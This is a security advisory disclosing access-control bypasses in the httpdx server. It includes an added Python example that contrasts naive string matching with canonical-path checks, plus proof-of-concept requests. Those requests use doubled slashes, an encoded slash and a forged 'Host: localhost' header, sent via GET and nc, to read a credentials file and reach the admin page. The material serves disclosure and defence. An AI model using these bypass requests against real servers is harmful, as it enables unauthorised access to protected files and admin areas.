--------------------------------------------------------------------------------------------
20130212 - Justanotherhacker.com : httpdx multiple access control bypass
JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt
--------------------------------------------------------------------------------------------

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only a few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: http://sourceforge.net/projects/httpdx/ ]

--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:

    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }

And another example:

    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            user="admin",
            pass="passw000",
            realm="Stuff for admin only!"
        };
    }

As long as the request does not match these static strings but the path still resolves to the
same file, the content is served.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces, virtualhost-specific behaviour must be configured through similar string matching
directives:

    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{

The variable HTTP_HOST is set from the Host: header in the request, so in order to reach the
localhost virtualhost remotely, a client only has to set its Host: header to localhost.
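The defect described above is a check applied to the raw request string instead of to the
resource the server will actually open. The following is an added example (not code from the
advisory or from the httpdx project) that models the two quoted rules in Python: naive_decision
compares the raw REQUEST_URI and Host header to static strings the way the advisory describes,
while hardened_decision applies the same policy to a canonicalised path and uses the peer
address rather than the client-supplied Host header to decide whether a request is local. The
rule table, the helper names and the peer addresses are assumptions made for the example; the
two request paths are the ones quoted in the advisory.

```python
"""Added example, not part of the JAHx131 advisory or of httpdx.

Shows why matching raw request strings is bypassable and how evaluating
the same policy on a canonical path plus the real peer address closes
the gap.  All sample requests and addresses below are constructed.
"""
from urllib.parse import unquote
import ipaddress
import posixpath

# Constructed rule table mirroring the two rules quoted in the advisory:
# a file that must never be served, and an admin page that requires
# credentials and lives in the localhost virtual host.
DENIED = "/data/users.txt"
ADMIN = "/admin.html"


def naive_decision(raw_path: str, host_header: str) -> str:
    """httpdx-style check as the advisory describes it: the raw
    REQUEST_URI and the Host header are compared to static strings."""
    if raw_path.startswith(DENIED):
        return "deny"
    # Virtual host selection trusts the Host: header sent by the client.
    on_localhost_vhost = host_header == "localhost" or host_header.startswith("127.")
    if on_localhost_vhost and raw_path.startswith(ADMIN):
        return "auth-required"
    return "allow"


def canonical_path(raw_path: str) -> str:
    """Reduce a request path to the single spelling the rules are written
    against: drop the query string, percent-decode once (the same way the
    file-serving code does), collapse repeated slashes and resolve '.'
    and '..' segments."""
    path = raw_path.split("?", 1)[0]
    decoded = unquote(path)
    # posixpath.normpath keeps a leading '//' because POSIX allows it, so
    # strip every leading slash and put exactly one back before normalising.
    return posixpath.normpath("/" + decoded.lstrip("/"))


def hardened_decision(raw_path: str, host_header: str, peer_ip: str) -> str:
    """Same policy, evaluated on the canonical path and on the address the
    connection actually came from.  host_header is accepted only so the
    signature lines up with naive_decision; it is deliberately unused."""
    path = canonical_path(raw_path)
    if path == DENIED or path.startswith(DENIED + "/"):
        return "deny"
    # The admin section belongs to the localhost virtual host; decide that
    # from the TCP peer, which a remote client cannot forge with a header.
    peer_is_local = ipaddress.ip_address(peer_ip).is_loopback
    if path == ADMIN or path.startswith(ADMIN + "/"):
        return "auth-required" if peer_is_local else "deny"
    return "allow"


# Constructed samples: (raw path, Host header, peer address).  The first two
# are the requests shown in the advisory; the last two are ordinary traffic.
SAMPLES = [
    ("/data//users.txt", "192.168.58.135", "10.0.0.5"),
    ("/%2fadmin.html", "localhost", "10.0.0.5"),
    ("/admin.html", "localhost", "127.0.0.1"),
    ("/index.html", "192.168.58.135", "10.0.0.5"),
]


def compare(samples=SAMPLES) -> dict:
    """Return {(path, host): (naive, hardened)} so the two policies can be
    diffed side by side; a row that differs is a bypass of the naive rule."""
    return {
        (path, host): (naive_decision(path, host), hardened_decision(path, host, peer))
        for path, host, peer in samples
    }


if __name__ == "__main__":
    for (path, host), (naive, hardened) in compare().items():
        flag = "  <-- bypass" if naive != hardened else ""
        print(f"{path:20} Host: {host:16} naive={naive:13} hardened={hardened}{flag}")
```

The important design point is that canonical_path must produce exactly the string the server
uses to open the file: if the access rule canonicalises differently from the file-serving code
(decoding twice where the server decodes once, or vice versa), the two can still be made to
disagree. The cleanest way to guarantee that is to have the file-serving code call the same
function and apply the rules to its result.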
Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx - http://sourceforge.net/projects/httpdx/
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully access
these restricted areas remotely:

Access user file:

    user@~$ GET http://192.168.58.135/data//users.txt
    user1=pass123
    user2=pass321

Access admin console:

    user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
    HTTP/1.1 200 OK
    Date: Thu, 08 Nov 2012 03:25:58 GMT
    Content-Type: text/html
    Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
    Content-Length: 36
    Connection: close
    Server: httpdx/1.5.4 (Win32)
    Pragma: no-cache

    Ok, you're now at admin's section.

--- Solution ---
The software appears to be abandoned and the same versions suffer from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure